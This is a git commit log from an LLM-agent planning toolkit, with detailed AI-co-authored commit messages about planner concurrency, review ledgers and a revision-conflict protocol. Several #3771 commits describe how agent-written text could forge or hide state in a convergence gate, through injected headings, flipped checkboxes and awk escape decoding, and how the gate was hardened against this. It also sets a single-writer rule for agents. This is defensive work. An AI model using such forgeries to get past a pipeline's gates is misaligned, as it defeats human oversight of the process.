e6d047decc23dfc802a0ffcc032d4a23b863bf7f
136 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
f9f72cb54c |
enhance(#3777): opt-in concurrent per-plan planners in chunked mode (#4346)
* test(#3777): add failing-first coverage for concurrent per-plan planner dispatch Extracts and executes the real bash blocks this PR is about to add to plan-phase.md and chunked-planning-mode.md (CHUNKED_PARALLEL resolution and the BATCH_PLAN_IDS dedup guard), plus config-set/config-get coverage for the new planning.chunked_parallel key. Expected RED against the current shipped workflow text — the extraction anchors do not exist yet. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * feat(#3777): dispatch chunked mode's per-plan planners concurrently within a Wave Adds opt-in planning.chunked_parallel (default false, byte-identical to the existing serial loop). When true and the runtime's negotiated dispatch capacity (dispatch-capacity, #3673) is greater than 1, chunked planning's per-plan Tasks that share one outline Wave are issued together instead of one at a time; a later Wave still waits for the current one to be verified on disk and committed. A host with no declared maxConcurrency (most non-Claude runtimes today) stays serial regardless of the setting. Resolution and the Plan-ID dedup guard live in chunked-planning-mode.md itself (gated on the section's own CHUNKED_MODE skip-check) rather than in plan-phase.md, so a non-chunked run pays no extra gsd_run calls. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * test(#3777): repoint extraction at chunked-planning-mode.md after the move CHUNKED_PARALLEL resolution moved out of plan-phase.md into chunked-planning-mode.md itself (see the preceding commit); update the test's extraction path and header comment to match. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3777): relocate the canonical runtime-launcher preamble before its first use The CHUNKED_PARALLEL resolution block's two gsd_run calls landed earlier in the file than the sole existing preamble (in the commit step), which tests/runtime-launcher-parity.test.cjs's (B) check requires to precede every gsd_run call in the file. Move the preamble (not duplicate it) to the top of the resolution block; the commit step's fenced block now just calls gsd_run directly. Caught by the GREEN checkpoint gsd-test run before push. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3777): strip the canonical preamble from the extracted resolution block The CHUNKED_PARALLEL resolution fence now carries the relocated runtime-launcher preamble as its first line (previous commit). Extracting the whole fence and running it after the test's own gsd_run stub let the embedded preamble's own resolver logic `unset -f gsd_run` and exit 1 before reaching the resolution logic, since no real gsd-tools.cjs exists in the temp script dir — every test calling runChunkedParallelResolution() failed. Strip the preamble (sourced from gsd-core/workflows/_runtime-launcher.snippet.sh, the same file scripts/sync-runtime-launcher.cjs treats as canonical) before splicing in the stub, so this suite tests only the resolution logic it is actually about. Caught by the post-rebase gsd-test run before push. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * docs(#3777): add the How-To page the phase gate requires Enablement is 2 commands (config-set, then --chunked), which this repo's own doc-quadrant gate flags as how-to-owed: a reference table cannot carry a sequence. Covers enablement, the dispatch-capacity gate's honest "most runtimes today: no effect" case, and the two accepted trade-offs. An earlier reasoning pass (recorded in .gsd/phase/.../70-docs.json before this commit) had incorrectly claimed #3034 shipped with no equivalent how-to page, as precedent for skipping one here. That claim was false — docs/how-to/enable-parallel-reviewer-lanes.md exists and is indexed. The phase gate caught the omission before merge; corrected here. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * docs(#3777): backfill changeset PR number Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com> |
||
|
|
1db726ebbf |
feat(#3806): canonize the Review Dispositions Ledger contract (#4345)
* test(#3806): add parity tests for the Review Dispositions Ledger contract Failing-first: asserts references/planner-reviews.md, workflows/plan-phase.md, and agents/gsd-plan-checker.md agree on a single canonical "Review Dispositions Ledger" heading, its round-scoping, L##@{sha} anchor format, and append-only supersession rule. These fail until the canon and its two references are added. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * feat(#3806): canonize the Review Dispositions Ledger contract Promote the existing planner-reviews.md Step 4 return-payload tables (Review Feedback Addressed/Deferred) into a canonical `## Review Dispositions Ledger` PLAN.md section, stated once in planner-reviews.md and referenced (not restated) from plan-phase.md's <review_incorporation_contract> and gsd-plan-checker.md's Review Incorporation dimension. Adds round-scoping (`### Round {N} — {REVIEWS_sha}`), a `L##@{sha}` line-anchor format so a REVIEWS.md reference survives the file being rewritten each round, and an append-only supersession rule. Scoped to part 1 only per the maintainer's approved-feature verdict — the deterministic lint/check verb (part 2) is explicitly deferred to a follow-up. Also: ADR-3806 recording the decision, a docs/features/ fragment (FEATURES.md is generated), and a changeset fragment. Closes #3806 Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3806): fenced-example count bug and lint findings from review - tests/plan-review-convergence.test.cjs: the "heading exactly once" test counted the canonical heading text globally, so it also matched the illustrative fenced-code example in planner-reviews.md that shows the same heading as sample content, always failing 2 !== 1. Rewritten as a bounded line scanner that skips fenced blocks (found by an isolated adversarial review pass). Also bounded an unbounded regex quantifier over readFileSync content flagged by local/no-unbounded-quantifier. - docs/features/review-dispositions-ledger.md: match house fragment style (bold-lead paragraphs, not #### headings) per the Standards-axis review; regenerated docs/FEATURES.md. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3806): fit reference-cite fix within size hard caps; ack growth Trims the plan-phase.md / gsd-plan-checker.md reference-cite text to a single short clause pointing at gsd-core/references/planner-reviews.md (also fixes the bare `references/planner-reviews.md` cite the #3576 shipped-reference-cites gate rejects), bringing both files back under their SIZE hard caps and the plan-phase.md phase6 shrink-only baseline. Both files still grow slightly versus origin/next, acknowledged below per ADR-2719's emitted-drift-ack contract. Emitted-Drift-Ack-Growth: gsd-plan-checker.md — adds a short pointer (in the existing Review Incorporation bullet) to the canonical Review Dispositions Ledger location (#3806); stays within the LARGE hard cap. Emitted-Drift-Ack-Growth: plan-phase.md — adds a short pointer (in the existing review_incorporation_contract bullet) to the canonical Review Dispositions Ledger location (#3806); stays under the XL hard cap and the phase6 shrink-only baseline. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3806): correct malformed Emitted-Drift-Ack-Growth trailer block The previous commit's two Emitted-Drift-Ack-Growth trailers were separated from the Co-Authored-By trailer by a blank line, so git's own trailer parser (which tests/helpers/emitted-runtime.cjs reads via `%(trailers:key=...)`) only recognized the last contiguous block (Co-Authored-By) and treated the Ack-Growth lines as ordinary body text — invisible to the emitted-attribution gate, not malformed data. Restating them here as one contiguous trailer block, git log over the PR range aggregates trailers from every commit, so this is additive. Emitted-Drift-Ack-Growth: gsd-plan-checker.md — adds a short pointer (in the existing Review Incorporation bullet) to the canonical Review Dispositions Ledger location (#3806); stays within the LARGE hard cap. Emitted-Drift-Ack-Growth: plan-phase.md — adds a short pointer (in the existing review_incorporation_contract bullet) to the canonical Review Dispositions Ledger location (#3806); stays under the XL hard cap and the phase6 shrink-only baseline. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3806): isolate the ack-trailer paragraph as its own trailer block Git's trailer parser requires the trailer paragraph to be the message's final paragraph, preceded by a blank line, and to contain nothing but trailer-shaped lines. The prior commit's blank line before the trailer lines was missing, which folded the leading Emitted-Drift-Ack-Growth lines into an ordinary prose paragraph. Emitted-Drift-Ack-Growth: gsd-plan-checker.md — adds a short pointer (in the existing Review Incorporation bullet) to the canonical Review Dispositions Ledger location (#3806); stays within the LARGE hard cap. Emitted-Drift-Ack-Growth: plan-phase.md — adds a short pointer (in the existing review_incorporation_contract bullet) to the canonical Review Dispositions Ledger location (#3806); stays under the XL hard cap and the phase6 shrink-only baseline. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * docs(#3806): backfill PR #4345 into changeset and ADR Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com> |
||
|
|
1017898cb9 |
fix(#3771): make remediation examples non-binding and surface revision conflicts (#3916)
* fix(#3771): separate the binding property from the advisory remediation
Checker findings fused "what property failed" with "how to fix it" into a
single `fix_hint` and never marked which half binds. The checker rendered
every hint under a "must fix" heading, the orchestrators injected the issues
verbatim and ordered targeted updates, and the shared revision references
mapped each hint to a prescriptive strategy — so a contract-following planner
applied a hint literally even when a smaller mechanism satisfied the same
property, or when the hint contradicted a locked decision. There was no
channel to report that conflict, and every attempt burned a revision
iteration.
Checker side: every issue now carries a binding `required_property` (the
invariant that failed) plus its evidence and severity, and `fix_hint` is
labelled non-binding wherever it appears — including the human-facing blocker
rendering, so "must fix" unambiguously names the property and never the
example.
Planner side: revision re-checks locked decisions, capability guidance and
existing plan constraints before editing; satisfying a blocker through a
smaller valid alternative counts as addressing it; and a hint that conflicts
with any of those returns `REVISION_CONFLICT` carrying the conflict and the
alternatives considered. Orchestrators route that to user choice or the
configured plan-review convergence loop without consuming retry budget.
Also applied to the UI-spec revision loop and the gap-plan hint, and the
generic pattern's stray `suggested_fix` field name is reconciled to the
plan-checker's `fix_hint`.
Nothing legitimately binding is weakened: blockers still block, severity
still gates, iteration caps and stall escalation still fire, and required
task fields and decision coverage still hold.
Refs #3771
* test(#3771): pin the binding/advisory split across the revision chain
Locks the separation at every link that carries it: the checker's issue
schema and blocker rendering, the planner's constraint re-check and
REVISION_CONFLICT return, the generic pattern's reconciled field names, and
each orchestrator's conflict routing without retry-budget consumption. Also
pins what must not have been weakened — blockers, severity gating, iteration
caps and stall escalation.
Red against the pre-fix prose: 32 of 34 assertions fail (the 2 that pass are
the preservation checks, correctly).
Refs #3771
* chore(#3771): add changeset fragment for the remediation-binding fix
* chore(#3771): acknowledge the remediation-binding growth
Five runtime-loaded files grow: the two checkers carry the binding/advisory
split where the model reads it (a `required_property` on every dimension
example, since a schema the examples contradict teaches the examples), and
the three orchestrators carry the REVISION_CONFLICT route, which has to live
with the `iteration_count`/`revision_count` state it declines to spend.
Deletes tests/emitted-drift-acks/3172-stated-failing-direction.json: it is
fully spent on next and still owned plan-phase.md, so it walls off a key it
can no longer clear (#3078). Its removal is the documented remedy for the
duplicate-key collision, not drive-by cleanup.
* fix(#3771): close the review gaps in the conflict contract
Adversarial review (Codex, Antigravity) found four real defects in the first
pass, each confirmed against the source before acting:
- The UI checker's structured return still ordered `Fix: {exact fix required}`
and "list each BLOCK dimension with exact fix required". The dimension
examples had been marked non-binding but the rendering the researcher
actually reads had not — the same omission this issue is about.
- `ui-phase` and the canonical `revision-loop` flow incremented their counter
BEFORE dispatching the reviser, so "do NOT increment on REVISION_CONFLICT"
was unreachable prose: the iteration was already spent. The increment now
sits on the return path in both.
- The conflict gate offered "accept as-is", which is an early exit from a
still-failing blocker — a weakening the brief explicitly forbids. The three
options are now adopt an alternative / override the constraint / amend the
constraint; every one resolves the conflict. Accepting an unaddressed blocker
remains available only at the unchanged iteration-cap escalation.
- The convergence route was declarative: nothing in
plan-review-convergence.md could receive a conflict. plan-phase now records
it in REVIEWS.md — the channel that loop already consumes — convergence
refuses to declare convergence over an open entry, and routing back into a
run convergence itself started is explicitly excluded as a cycle. `quick` has
no REVIEWS.md and no phase, so its convergence branch was dead prose and is
deleted in favour of asking the user.
Also reconciles the last two drifted field names (`finding`, `affected_field`)
to the plan-checker schema, and repairs a silent no-op: the few-shot
`required_property` insertion never applied because those lines are
blockquoted, and the test's own block filter was anchored on indentation only,
so a vacuous loop passed over zero blocks. Both are fixed and the filter now
asserts it found blocks.
Refs #3771
* chore(#3771): extend the growth acknowledgment for the review round
plan-review-convergence.md joins the list: the conflict route needed a
receiving end, and it lands on the seam that loop already reads (REVIEWS.md)
rather than a new mechanism. The plan-phase, ui-phase and gsd-ui-checker
entries gain the second-pass reasoning — an executable convergence branch, the
increment moved onto the return path, and the structured return that still
ordered an exact fix.
* fix(#3771): make the conflict route bounded, ordered, and owned
Round-2 adversarial review found five more defects, each confirmed in the
source before acting:
- The convergence gate sat AFTER `gsd_run state planned-phase` and the success
banner, so a run could write and announce convergence over an unresolved
conflict. OPEN_CONFLICTS is now read from REVIEWS.md and is part of the
converged CONDITION, evaluated before any write.
- plan-phase's cycle-exclusion ("unless this run was invoked by convergence")
was not a question the orchestrator can answer at runtime. plan-phase now
never invokes convergence at all — it records the conflict when a phase
REVIEWS.md exists and resolves it with the user in-place, which removes the
cycle instead of describing it.
- Closure had no owner. plan-phase writes the row, so plan-phase strikes it
resolved; convergence only reads. An open row is a live blocker, never a
stale artifact.
- Declining to increment the counter removed the only bound on the conflict
path: an agent returning the same conflict forever would loop unattended. A
conflict naming the same `required_property` twice in a row is now a stall
and escalates through the existing gate.
- verify-work's gap-plan revision loop hands `<revision_context>` to
gsd-planner and so inherits the whole contract, but stated none of it and
could not handle the conflict return. It is now covered like the others, and
is in the test's orchestrator table.
Refs #3771
* chore(#3771): acknowledge the round-2 growth
verify-work.md joins the list — the flow the second review found missed — and
the plan-phase, ui-phase and plan-review-convergence entries gain the
round-2 reasoning: the gate moved ahead of the state write, the convergence
hand-off replaced with a runtime-checkable record-and-resolve, and the
recurrence bound that replaces the counter the conflict path stopped spending.
* fix(#3771): make the convergence gate countable and stop the conflict fall-through
Third adversarial round (Antigravity) found three defects:
- The OPEN_CONFLICTS pipeline had no `grep -v '~~'` despite its own comment
claiming one, and `grep -c '^| '` also counts a markdown table's header and
separator rows — every resolved conflict would have read as open and
convergence would have deadlocked instead of converging. plan-phase now
records each conflict as a `- [ ]` checklist line and flips it to `- [x]`, so
the gate is an exact fixed-string match with no table parsing.
- "then continue below" fell through to the checker spawn, so a SECOND
REVISION_CONFLICT would have been handed to the checker as though it were a
revised plan. plan-phase, quick and verify-work now re-evaluate the return
from the top of the conflict handler; ui-phase already looped back.
- revision-loop.md still described plan-phase routing a conflict to the
convergence loop instead of asking — the behaviour round 2 removed. Recording
is now stated as being in addition to asking, never instead of it.
Refs #3771
* chore(#3771): bring the changeset in line with what shipped
Two review rounds widened the change after the fragment was written:
verify-work's gap-plan revision and the convergence loop are covered, two
more drifted field names are reconciled, and the conflict path carries an
explicit recurrence bound.
* fix(#3771): declare and emit the REVISION_CONFLICT marker
check:contract-drift on CI caught what local lint never reached: four
workflows dispatch on `## REVISION_CONFLICT`, but no agent declared or emitted
it — an orphan consumer, matching a marker nothing produces. The shared
reference (planner-revision.md Step 7b) described the return; the agent
definitions did not carry it.
gsd-planner and gsd-ui-researcher now emit the marker in-fence alongside their
other return markers, and both registry rows in agent-contracts.md declare it.
gsd-planner's Consumed by gains the two workflows that dispatch on it and were
missing from the row.
The gate is right: a return contract belongs where the agent is defined, not
only in a reference the agent happens to load.
Refs #3771
* chore(#3771): acknowledge the return-marker growth
gsd-planner.md and gsd-ui-researcher.md each gain the REVISION_CONFLICT
marker that check:contract-drift requires them to emit.
* fix(#3771): hoist the shared conflict protocol out of the workflows
Two CI failures, both correct gates:
- tests/few-shot-calibration.test.cjs pins the plan-checker calibration file
at exactly 4 examples (2 positive, 2 negative). The example added in the
first pass broke that balance — and described PLANNER behaviour in the
CHECKER's calibration set, which is the wrong surface for it. Removed; the
smaller-alternative rule is already normative in gsd-plan-checker.md and
planner-revision.md, and pinned by the regression suite.
- tests/phase6-capstone-conformance.test.cjs (ADR-857 phase 6, #1168) requires
plan-phase.md to stay BELOW its pre-phase-6 baseline of 94519 bytes. The
inline conflict block pushed it to 94988.
The fix for the second is the one that should have been made first: the
record/resolve/close protocol and the recurrence bound were identical in four
workflows, and revision-loop.md — which plan-phase already @-imports — is what
a shared contract is for. The protocol now lives there once; plan-phase states
only its bindings (which counter, which artifact, which next step) and points
at it. plan-phase.md: 94988 -> 92739, under the ratchet with headroom, and the
four-way duplication is gone.
quick, ui-phase and verify-work do not import the reference, so they keep their
inline statements. The suite asserts each rule against what the runtime
actually loads for that orchestrator, not against the file in isolation.
Refs #3771
* docs(#3771): state the shared-protocol relationship accurately
Three of the four revision-bearing workflows do not @-import revision-loop.md,
so 'follows it verbatim' overstated the coupling. Only plan-phase defers; the
others restate the rules inline and this section is the authority they must
agree with.
* refactor(#3771): name the authority instead of restating it four times
Self-review finding: the same ~700-byte reviser paragraph was inlined in four
prompts while gsd-planner already loads planner-revision.md whenever
<revision_context> is present (agents/gsd-planner.md:555, :588) — a fifth copy
of the same contract. Four places to edit in lockstep is precisely the drift
class this PR exists to fix; the generic pattern calling the field
suggested_fix while the checker emitted fix_hint is what that looks like after
a year.
Each prompt now carries only the load-bearing clauses and names the authority
it summarises. Deliberately NOT reduced to a bare pointer: these are LLM
prompts, and a contract stated only in a file the reader is supposed to fetch
is the failure mode of this very bug. The saving is modest (~50 bytes each) —
the point is the named source of truth, not the bytes.
Suite: dropped seven assertions that pinned heading text and bold-lead
phrasing a reword would break without changing what the runtime is told; their
neighbours already pin the same contract by content. 519 -> 499 lines, 61
tests. Red gate against origin/next: 56 of 61 fail.
Refs #3771
* fix(#3771): sanitize agent-authored conflict text and bound total conflicts
Cross-AI review (agy/Gemini) raised two security findings. I confirmed the
first by running the gate's own awk against a crafted file and reproduced it
exactly; the second is a real hole in my bound.
1. FAIL-OPEN in the convergence gate. The conflict text is agent-authored and
is appended to REVIEWS.md, which the gate scans with an awk that stops at
the next '## ' heading. One line of agent text beginning '## ' ends that
scan early, so conflicts below it are never counted and convergence declares
success over a live blocker. Measured: 3 open conflicts, awk returned 2.
Fixed at the write boundary, which is the trust boundary: every field has
newlines and tabs collapsed to spaces and a leading '#', '-', '|' or fence
stripped, so one conflict is exactly one line. Both producing agents now
declare their fields single-line plain text, and the reader states the
invariant it depends on so a later edit cannot silently break it. Verified:
3 open + 1 resolved now counts 3; missing file and absent section count 0.
2. The recurrence bound was 'same required_property twice in a row', which an
agent alternating property names never trips, leaving the un-incremented
conflict path unbounded. Now bounded twice: the repeat rule catches the
common case, and the THIRD conflict return of a loop escalates whatever
property it names. A conflict still never consumes a revision iteration;
this cap is separate from and additional to the revision cap.
Rejected from the same review: deleting 'a planner that reaches
required_property by a smaller or different mechanism has addressed the issue
in full' from the CHECKER prompt as misplaced. It is load-bearing exactly
there. A checker that does not know a different mechanism counts will re-flag
the issue on re-check, which is the revision loop that never terminates. The
argument offered for deleting it, that the checker evaluates the new state
independently, describes the failure mode.
Refs #3771
* fix(#3771): fail closed on an unverifiable convergence gate
Second cross-AI pass (agy, this time with the full files rather than the diff)
found two more, both real:
1. The gate read REVIEWS_FILE with `2>/dev/null || echo 0`, so an unreadable or
empty path counted as ZERO open conflicts and converged. That path is
resolved a few lines earlier by a pre-existing unquoted
`ls ${phase_dir}/${padded_phase}-REVIEWS.md` (line 346, not touched by this
PR), which yields an empty string rather than an error when the path
contains a space. Unverifiable is not clean: the gate now tests -z and -r
first and BLOCKS. Verified both branches.
The unquoted ls itself is left alone deliberately — it predates this change
and belongs to the reviews lookup, not the conflict gate. Fixing it at my
own boundary removes its effect on this gate without widening scope.
2. REVIEWS.md is writable by the review agent, which could flip a `- [ ]` to
`- [x]` or delete the section and forge the state of a blocking gate. The
section now declares a single writer: /gsd:plan-phase appends and closes,
every other agent leaves it byte-for-byte alone, readers read.
Also trimmed a clause that explained the increment ordering by reference to
what the file said before this PR. Commit history is not instruction, and
these files are prompts.
Rejected: the claim that quick's conflict gate deadlocks autonomous pipelines
by asking the user. Its existing max-iteration escalation in the same file
already asks the user the same way; this adds no new interaction class.
Noted but out of scope: the per-dimension YAML example blocks and the shim
boilerplate duplicated across agent prompts both predate this change.
Refs #3771
* fix(#3771): count conflicts by line shape, not by section
CodeRabbit review on the rehearsal PR. Five findings, all valid, all applied.
The best one is a deletion. The convergence gate scanned between
'## Plan-Revision Conflicts' and the next '## ' heading, and that scan stops at
the FIRST heading it meets — so one stray '## ' line hid every conflict beneath
it and returned 0, converging over a live blocker. Reproduced: section-scan 0,
shape-scan 1. Sanitizing at the write boundary does not cover a hand-edited,
legacy, or foreign-written REVIEWS.md, so the reader needed its own guarantee.
It now matches the conflict line SHAPE anywhere in the file:
grep -c '^- \[ \] .*required_property:'
No section bookkeeping, nothing a heading can truncate, and it composes with the
writer's sanitization (which strips a leading '-' from agent text, so agent prose
cannot forge the shape). Verified: injected heading -> 1, all resolved -> 0.
The other four:
- Both checkers told the author never to emit a contradictory fix_hint, then
offered an escape hatch that put the forbidden route in the hint anyway. They
now name NO route in that case and state only that the property conflicts with
the constraint. A hint carrying a forbidden route is applied by anyone who
trusts hints.
- The REVISION_CONFLICT marker description in gsd-planner.md was narrower than
planner-revision.md: it covered a contradictory hint but not an unreachable
required_property. A planner reading only the agent file would have burned
retry budget on the case the reference routes to a conflict.
- The few-shot calibration examples used uppercase BLOCKER/INFO while the schema
defines blocker/warning/info. Pre-existing, but it is the same schema-vs-example
disagreement this PR exists to end, and the file was already being edited.
- verify-work's re-entry instruction existed but sat after the Bounded clause, so
the paragraph read "re-spawn ... stop re-spawning ... after re-spawning". The
re-entry now immediately follows the re-spawn, and states that only a
non-conflict return may reach the checker or increment iteration_count.
Refs #3771
* fix(#3771): resolve the contradictory scope_sanity severity examples
Sixth CodeRabbit finding, posted outside the diff range and missed on my first
read — I had claimed all findings were addressed after reading only the five
inline comments. This one was in the review body.
agents/gsd-plan-checker.md carried TWO scope_sanity examples with identical
metrics (5 tasks, 12 files) and OPPOSITE severities: warning in Dimension 5,
blocker in <examples>. Line 872 states "2-3 tasks/plan good, 4 warning, 5+
blocker" and the severity table lists warning as "Scope 4 tasks (borderline)",
so the warning example contradicted both.
ADR-2629 Decision 5's "over budget is a WARNING, never a blocker" does not
excuse it: that rule governs the smart-zone TOKEN estimate (the estimate-check
verb, lines 299-306), which is a different axis from task count. Verified in
source before touching it.
The contradiction is pre-existing but this PR made it binding and visible:
severity is now declared part of the binding payload, and both examples were
given the same required_property, so they now disagree on the severity of an
identical finding about an identical property.
Deviating from the proposed correction, which was warning -> blocker: that
would duplicate the <examples> entry outright (same tasks, files, severity).
The Dimension 5 example is instead made a genuine 4-task borderline warning, so
the file keeps one worked example per severity and the thresholds, the severity
table and both examples finally agree.
Refs #3771
* fix(#3771): stop laundering a grep error into zero open conflicts
Seventh CodeRabbit finding — from a SECOND review round my own CR-4 push
triggered, which I had not looked for. This one is a regression I introduced
while fixing the previous fail-open.
CR-4 replaced the truncatable section scan with:
OPEN_CONFLICTS=$(grep -c '^- \[ \] .*required_property:' "$REVIEWS_FILE" || true)
`|| true` masks every grep failure. grep exits 1 for "no matches" (a legitimate
zero) but 2 for a read error, and `|| true` turns both into an empty capture
that `${OPEN_CONFLICTS:-0}` renders as 0. If REVIEWS.md is removed or becomes
unreadable between the -r check and the scan, the gate reports no conflicts and
convergence proceeds. Proven: unreadable file -> captured empty -> 0.
The status is now inspected, and only exit 1 counts as zero; anything else
blocks.
My first attempt at this fix was itself wrong and my own harness caught it: I
wrote `if ! grep ...; then grep_status=$?`, but `!` inverts the status, so `$?`
in that branch is 0 and every failure reads as success — the clean-file case
printed "BLOCKED (grep exit 0)". The status must be read in the ELSE branch of a
non-negated `if`, which is what CodeRabbit proposed. Both traps are now pinned
by tests.
Verified end to end: all resolved -> 0, no conflicts at all -> 0, injected
heading -> 1, unreadable file -> BLOCKED with grep exit 2.
Refs #3771
* test(#3771): execute the conflict gate instead of reading it
CodeRabbit round three: 0 actionable, 1 nitpick — "these assertions inspect
Markdown source only; they do not prove that grep status 1 produces zero
conflicts or that a scan error exits before convergence." Rated Trivial. It is
the most valuable finding of the three rounds.
This gate has been wrong three times: a section scan a heading could truncate, a
`|| true` that laundered grep's error status into zero, and an `if !` whose `$?`
reported the negation rather than the command. Every one of those passed the
text assertions that existed at the time. I proved each fix by hand in a shell,
and none of that proof lived in the suite.
The gate is one self-contained fenced block, so the test now extracts it from
the workflow — located by content, not line number — writes it to a script and
RUNS it against fixtures: two open plus one resolved counts 2; no matches counts
0 and does not fail; a conflict below an injected `## ` heading still counts; an
unreadable path and an empty path both BLOCK with a non-zero status and no zero
count on stdout.
Non-vacuity proven by mutation rather than asserted. Reverting the gate to each
of its three historical broken forms reds the suite:
section-scan awk -> 7 failures (5 in the gate cases)
|| true -> 4 failures (3 in the gate cases)
if ! (negated $?) -> 4 failures (3 in the gate cases)
restored -> 69 pass, 0 fail
The prose assertions stay: they are the right instrument for a prompt. This
covers the one part of the change that is real shell an orchestrator executes.
Refs #3771
* test(#3771): route the gate harness through the shared test helpers
ESLint's project rules caught three violations in the new harness: an unbounded
execFileSync (DEFECT.UNBOUNDED-SUBPROCESS — an unbounded spawn is an indefinite
hang, and on macOS CI that is how a stuck run stops reporting instead of failing)
and two raw fs.rmSync calls, which skip the Windows-EBUSY retry budget that
helpers.cleanup carries.
Now uses createTempDir/cleanup from tests/helpers.cjs and passes an explicit
30s timeout. Suppressing the rules was available and would have been the wrong
call: both exist because of real CI failure modes on platforms I am not testing
on.
* chore(#3771): backfill the changeset PR number
The pr: field is drift-checked against the PR event payload, so it cannot be
written before the PR exists. Set to 3916.
* fix(#3771): close revision conflict persistence gaps
Use the authoritative review artifact, keep conflict and normal retry paths disjoint, and enforce one writer-reader grammar so malformed state fails closed.
Emitted-Drift-Ack-Growth: diagnose-issues.md — #3771 marks the gap-plan remediation hint non-binding while keeping root_cause authoritative
Emitted-Drift-Ack-Growth: gsd-plan-checker.md — #3771 separates binding required_property evidence from advisory fix_hint examples across the checker contract
Emitted-Drift-Ack-Growth: gsd-planner.md — #3771 declares the REVISION_CONFLICT return used when remediation contradicts governing constraints
Emitted-Drift-Ack-Growth: gsd-ui-checker.md — #3771 applies the same binding-property and advisory-hint split to UI review findings
Emitted-Drift-Ack-Growth: gsd-ui-researcher.md — #3771 defines the UI revision producer's structured REVISION_CONFLICT return
Emitted-Drift-Ack-Growth: plan-phase.md — #3771 routes and persists bounded revision conflicts before spending the normal retry budget
Emitted-Drift-Ack-Growth: plan-review-convergence.md — #3771 adds the fail-closed owned-block parser and prevents convergence over open conflicts
Emitted-Drift-Ack-Growth: review.md — #3771 emits and preserves the canonical writer-owned conflict block across review regeneration
Emitted-Drift-Ack-Growth: ui-phase.md — #3771 routes UI revision conflicts to resolution before consuming revision_count
Emitted-Drift-Ack-Growth: verify-work.md — #3771 gives gap-plan revision the same bounded conflict route before iteration_count
* test(#3916): guard rebases against schema drift
Load the current-base progressive-disclosure examples so every integrated issue remains bound by required_property after branch reconciliation.
* test(#3916): skip the extracted-gate suite's bash spawns on win32
Third review round's sole survivor: runConflictGate()/withReviews() spawn
bash against a Node-native temp path built by createTempDir(), which is
backslash-separated on the Windows CI lane and not a path Git Bash is
guaranteed to accept (DEFECT.WINDOWS-TEST-PORTABILITY, matching the
observed CI failure at revision-remediation-binding.test.cjs:844,
ENOENT on a path Windows read as a directory separator). No eslint rule
catches it since the call has neither a chmod nor a `bash -c` form.
Guards the four call sites with the repo's existing skipOnWin32
convention (describe/test `{ skip: IS_WINDOWS }`) rather than
normalizing the harness path to forward slashes, which would defeat the
one test whose purpose is proving the production gate does NOT rewrite
a literal backslash in a POSIX filename.
* fix(#3916): backfill changeset pr field to the fork validation PR number
* fix(#3771): forbid silently accepting an open plan-revision conflict at max-cycles escalation
The max-cycles escalation prompt only surfaced HIGH_COUNT and ACTIONABLE_COUNT; an open
plan-revision conflict (OPEN_CONFLICTS > 0) was never disclosed there, and "Proceed anyway"
could exit successfully over it — exactly the failure mode this PR exists to close (a success
banner over an unresolved conflict nobody resolved). Blockers still block: withhold "Proceed
anyway" and route to Manual review whenever a conflict is open.
* fix(#3771): do not hard-block REVISION_CONFLICT persistence when no REVIEWS.md exists yet
A phase's first-ever revision cycle can return REVISION_CONFLICT before any REVIEWS.md has been
written — REVIEWS_PATH is then legitimately empty, not a corrupt or deleted file. The persistence
gate's own accompanying prose already says the record channel applies 'when REVIEWS_FILE is
non-empty', but the bash condition never checked that, so it hard-blocked every conflict on a
brand-new phase regardless of whether persistence was even expected to run. Require a non-empty
REVIEWS_FILE before treating a missing file as an error.
* chore(#3771): raise the plan-phase.md ADR-857 host-loop ceiling to 96700
The frozen pre-phase-6 ceiling (94519) collided on rebase: this PR's own
REVISION_CONFLICT persistence/routing gate is core planner control flow, not an
un-extracted optional feature, and landed alongside an unrelated, already-merged
same-file growth (the #4.6 context-drift pre-check) already on next. Same
rationale #1298 already established for execute-phase.md's ceiling.
* chore(#3916): backfill changeset pr field to the upstream PR number
* fix(#3771): make the writer-side REVISION_CONFLICT sanitize step real shell
The Conflict Return record channel sanitized agent-authored fields via a
prose instruction ("Sanitize each agent-authored field before appending")
for the orchestrator LLM to apply by hand, while the reader-side gate in
plan-review-convergence.md parses the same slot with real, executed awk.
Flagged Minor across two review rounds (round 4, round 6) since no code
performed the sanitize anywhere.
plan-phase.md's Conflict Return step now runs a real bash gate: sanitize
each field (collapse newline/tab to space, strip a leading #/-/|/fence),
build the one-line record, skip the append if an identical line already
exists (idempotent), insert before the writer-owned end delimiter, and
fail closed if that delimiter is missing rather than silently dropping
the conflict.
tests/revision-remediation-binding.test.cjs extracts and RUNS the new
fence (matching how the reader gate is already tested), composing it
with the existing reader gate: hostile-field fast-check fuzzing, a
repeated-conflict idempotency check, and a missing-delimiter fail-closed
check that the file is left byte-for-byte unchanged on failure.
Emitted-Drift-Ack-Growth: plan-phase.md — #3916 turns the writer-side
REVISION_CONFLICT sanitize+insert step into real, executed shell instead
of a prose instruction, matching the reader gate's existing rigor
* fix(#3916): backfill changeset pr field to the fork validation PR number
Fork CI's changeset-lint reads the real PR number from its own event
payload; the fragment still carried the upstream number from the last
sync, so the DEFECT.CHANGESET-PR-FIELD-DRIFT check failed on this fork
PR. Re-backfill to the upstream number before the final push.
* fix(#3771): close the awk -v forgery and same-session close gaps agy found
Adversarial review (gemini-3.8-flash-high via the internal agy review
lane) on the full PR found two BLOCKERs against the just-added
writer-side conflict gate:
1. `awk -v line="${LINE}"` decodes escape sequences in its argument, so
a literal two-character `\n` in agent-authored text became a real
